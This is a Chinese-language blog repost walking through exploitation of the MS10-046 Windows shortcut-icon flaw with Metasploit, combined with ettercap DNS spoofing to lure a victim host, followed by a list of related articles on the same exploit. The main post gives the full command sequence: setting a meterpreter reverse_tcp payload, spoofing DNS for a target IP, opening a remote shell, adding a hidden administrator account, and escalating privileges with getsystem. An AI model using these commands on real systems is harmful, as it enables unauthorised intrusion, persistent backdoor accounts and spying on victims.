ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗

最新推荐文章于 2023-07-29 23:23:36 发布
最新推荐文章于 2023-07-29 23:23:36 发布
阅读量305 收藏
点赞数
文章标签: 运维 shell 开发工具
原文链接:http://www.cnblogs.com/xunbu7/p/3455031.html
版权

ms10_046_shortcut_icon_dllloader漏洞利用过程

  1. msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  2. msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
  3. msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107
  4. msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.107
  5. msf exploit(ms10_046_shortcut_icon_dllloader) > show options
  6. msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

ettercap dns欺骗

  1. root@bt:~# cd /usr/local/share/ettercap/
  2. root@bt:/usr/local/share/ettercap# vim etter.dns        //在最后一行添加需要欺骗的域名,如下图

  3. root@bt:/usr/local/share/ettercap# ettercap -T -q -i eth0 -P dns_spoof /192.168.1.102/ //        //开始dns欺骗

利用结果显示

  1. 清空受害机器dns缓存:

  2. 受害主机访问 www.baidu.com

  3. Ettcap终端显示:

  4. 漏洞利用终端显示:

     

漏洞利用成功,开始利用

  1. msf exploit(ms10_046_shortcut_icon_dllloader) > sessions        //在漏洞利用终端输入,可以看到建立的会话
  2. msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1        //进入会话

     

  3. meterpreter > shell        //进入cmd shell

     

  4. 拿到cmd shell后就可以对受害主机进行基本控制。如:

    net user newuser password /add        //添加用户

    net localgroup administrators newuser /add        //增加权限

    exit        //退出cmd,返回会话

  5. meterpreter > ps        //列出受害主机进程

     

  6. meterpreter > getuid        //查看我当前拥有的权限

  7. meterpreter > getsystem        //提权

  8. meterpreter > help        //查看其他命令,可以键盘捕获,截屏等等其他强大功能

转载于:https://www.cnblogs.com/xunbu7/p/3455031.html

weixin_30755393
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS10-046漏洞复现配合DNS欺骗
qq_43655183的博客
09-07 695
利用ms10_046漏洞生成攻击URL: 使用漏洞攻击模块 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 设置payload set payload windows/meterpreter/reverse_tcp 设置攻击参数 set SRVHOST 攻击机IP set LHOST 攻击机IP 开始渗透 run ...
微软MS10-046漏洞的利用
我还在的博客
09-19 5458
微软MS10-046漏洞的利用0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构0x02 过程1. 相互ping通2. 启动Metasploit3. 查找和MS10-046相关的模块4. 加载模块5. 设置所使用的payload6. 设置文件共享服务器的地址,应为BackTrack虚拟机的地址7. 设置目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址8. ex...
ms10_046_shortcut_icon_dllloader 这个其实很好用
爱杀之爪的矩阵
04-08 3742
MS10_046_shortcut_icon_dllloader漏洞复现
m0_48907714的博客
03-11 5386
MS10_046漏洞复现 漏洞介绍:Windows Shell 中一个公开披露的漏洞。 如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 00x01实验环境 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp ip:192.168.72.6 使用的工具:msfconsole 00x02实验过程 打开两台虚拟机,打开kali的msf软件,搜索MS10_046漏洞,找到三个模块 本次复现第二个模
kali攻防第11章 攻击实例讲解-ms10_046快捷方式图标漏洞
安全参透之旅
12-18 3473
攻击实例讲解-ms10_046快捷方式图标漏洞   准备工具 1、kali系统 IP:10.10.10.131 2、受害者机子 IP:10.10.10.129 3、使用工具 msfconsole   步骤: 1、进入控制台 root@kali:~# msfconsole                                                      
禁用Ctrl+Alt+Del源码 .rar_ctrl alt del_shortcut_system
09-14
标题"禁用Ctrl+Alt+Del源码 .rar_ctrl alt del_shortcut_system"指向的压缩包文件包含了一种实现这一功能的源代码。 首先,我们需要了解在Windows系统中如何处理键盘事件。Windows操作系统有一个称为WinAPI...
关于shortcut iconicon代码的区别介绍
09-28
总结来说,`shortcut icon` 和 `icon` 的主要区别在于,`shortcut icon` 是一个专用于设置传统ICO格式快捷图标的属性,而`icon` 则更为灵活,可以支持各种图像格式,包括动态图标。在实际使用中,通常会同时使用两者...
qsdk-qca-shortcut-fe-2.7.029.zip_qca sdk_qca-wifi_qsdk_qsdk 驱动目
09-23
【标题】"qsdk-qca-shortcut-fe-2.7.029.zip" 是一个包含QCA SDK(Qualcomm Atheros Software Development Kit)的压缩文件,特别关注的是与QCA Wi-Fi相关的部分,用于驱动开发。这个版本是2.7.029,可能包含了针对...
_Context_Menu.rar_The Program
09-21
每个项都有多个属性,如`Text`(显示的文本)、`Name`(唯一标识符)、`ShortcutKeys`(快捷键)和`Click`事件(当用户选择该菜单项时触发的事件)。 5. **事件处理**: 对于每个`ToolStripMenuItem`,可以添加事件...
kaijie.rar_visual c
09-23
在这个例子中,项目名为"ShortCut",对应的文件有ShortCut.dsp和ShortCut.dsw,它们是项目的配置文件,用于保存项目设置和源代码组织信息。 3. **源代码文件**:项目中的源代码文件包括ShortCut.cpp、ShortCutDlg....
MS10-046漏洞测试
aozhuo4755的博客
11-09 710
这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSFMetasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模...
ms17-010 ms10-046 ms08-067漏洞利用
weixin_43227251的博客
01-13 1653
2020年1月7日 好了,到了第二天,早上起来的时候心情就是那么的激动 为什么呢,昨天熬夜到3点,终于吧环境搞好了,哎,我太难了! 今天一天主要做的事情是利用kali进行漏洞利用,具体利用过程和步骤如下: ms17-010,ms08-067,ms10-046漏洞利用 一. ms17-010 1.漏洞成因:当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个...
操作系统攻击:早期WindowsMS10-046漏洞
shelter1234567的博客
07-29 1109
本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER ,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss攻击用户的系统 危险性极高。
漏洞复现---MS10-046漏洞
liu914589417的博客
04-27 5300
漏洞复现—MS10-046漏洞 实验工具 1、VMware虚拟机 2、Windows7系统虚拟机 3、Kali 2021 系统虚拟机 1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。 2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。 3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。 4、引用编号
ms10-046漏洞利用+bypassuac提权
m0_62008601的博客
11-24 1081
记一次ms10-046漏洞复现过程+bypassuac提权过程
使用ms10_046对xp系统进行渗透
xiaopan233的博客
09-22 2369
本实验在虚拟机环境下进行!!! 准备: Kali 192.168.88.105 Xp  192.168.88.106  这个是一个图标漏洞,所以我们只需要设置好参数,等待靶机访问即可 进入msfconsole search  ms10_046 查找相应的模块 这里可以看到,有两个可用于攻击的模块,但一个是browser一个是smb,我们先试试browser的行不行 使用模块 ...
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4900
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
EXTRA_SHORTCUT_ICON_RESOURCE
最新发布
04-11
EXTRA_SHORTCUT_ICON_RESOURCE是Android中的一个常量,用于指定应用程序快捷方式的图标资源。当创建应用程序快捷方式时,可以使用该常量来指定快捷方式的图标。 使用EXTRA_SHORTCUT_ICON_RESOURCE时,需要传递一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值